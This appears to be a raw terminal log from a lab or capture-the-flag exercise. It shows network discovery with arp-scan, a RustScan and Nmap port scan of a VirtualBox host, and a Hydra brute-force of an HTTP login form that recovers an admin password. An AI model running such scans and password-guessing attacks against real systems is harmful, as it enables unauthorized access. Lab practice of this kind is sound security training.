4 packets received by filter, 0 packets dropped by kernel Ending arp-scan 1.10.0: 256 hosts scanned in 1.965 seconds (130.28 hosts/sec). 4 responded ❯ export ip=192.168.60.164 ❯ rustscan -a $ip .----. .-. .-. .----..---. .----. .---. .--. .-. .-. | {} }| { } |{ {__ {_ _}{ {__ / ___} / {} \ | `| | | .-. \| {_} |.-._} } | | .-._} }\ }/ /\ \| |\ | `-' `-'`-----'`----' `-' `----' `---' `-' `-'`-' `-' The Modern Day Port Scanner. ________________________________________ : http://discord.skerritt.blog : : https://github.com/RustScan/RustScan : -------------------------------------- RustScan: allowing you to send UDP packets into the void 1200x faster than NMAP [~] The config file is expected to be at "/home/Pepster/.rustscan.toml" [!] File limit is lower than default batch size. Consider upping with --ulimit. May cause harm to sensitive servers [!] Your file limit is very small, which negatively impacts RustScan's speed. Use the Docker image, or up the Ulimit with '--ulimit 5000'. Open 192.168.60.164:22 Open 192.168.60.164:80 [~] Starting Script(s) [~] Starting Nmap 7.94SVN ( https://nmap.org ) at 2025-01-24 15:08 CST Initiating ARP Ping Scan at 15:08 Scanning 192.168.60.164 [1 port] Completed ARP Ping Scan at 15:08, 0.06s elapsed (1 total hosts) Initiating Parallel DNS resolution of 1 host. at 15:08 Completed Parallel DNS resolution of 1 host. at 15:08, 0.01s elapsed DNS resolution of 1 IPs took 0.01s. Mode: Async [#: 3, OK: 0, NX: 1, DR: 0, SF: 0, TR: 1, CN: 0] Initiating SYN Stealth Scan at 15:08 Scanning 192.168.60.164 [2 ports] Discovered open port 80/tcp on 192.168.60.164 Discovered open port 22/tcp on 192.168.60.164 Completed SYN Stealth Scan at 15:08, 0.07s elapsed (2 total ports) Nmap scan report for 192.168.60.164 Host is up, received arp-response (0.00033s latency). Scanned at 2025-01-24 15:08:22 CST for 0s
PORT STATE SERVICE REASON 22/tcp open ssh syn-ack ttl 64 80/tcp open http syn-ack ttl 64 MAC Address: 08:00:27:5E:70:F7 (Oracle VirtualBox virtual NIC)
Read data files from: /usr/share/nmap Nmap done: 1 IP address (1 host up) scanned in 0.36 seconds Raw packets sent: 3 (116B) | Rcvd: 3 (116B)
❯ hydra -l admin -P pass.txt $ip http-post-form "/index.php:username=^USER^&password=^PASS^:F=incorrectos" Hydra v9.5 (c) 2023 by van Hauser/THC & David Maciejak - Please do not use in military or secret service organizations, or for illegal purposes (this is non-binding, these *** ignore laws and ethics anyway).
Hydra (https://github.com/vanhauser-thc/thc-hydra) starting at 2025-01-24 15:41:50 [DATA] max 16 tasks per 1 server, overall 16 tasks, 36 login tries (l:1/p:36), ~3 tries per task [DATA] attacking http-post-form://192.168.60.164:80/index.php:username=^USER^&password=^PASS^:F=incorrectos [80][http-post-form] host: 192.168.60.164 login: admin password: 5a06153b12b2ec6210a8bb66f4e78c4a 1 of 1 target successfully completed, 1 valid password found Hydra (https://github.com/vanhauser-thc/thc-hydra) finished at 2025-01-24 15:41:51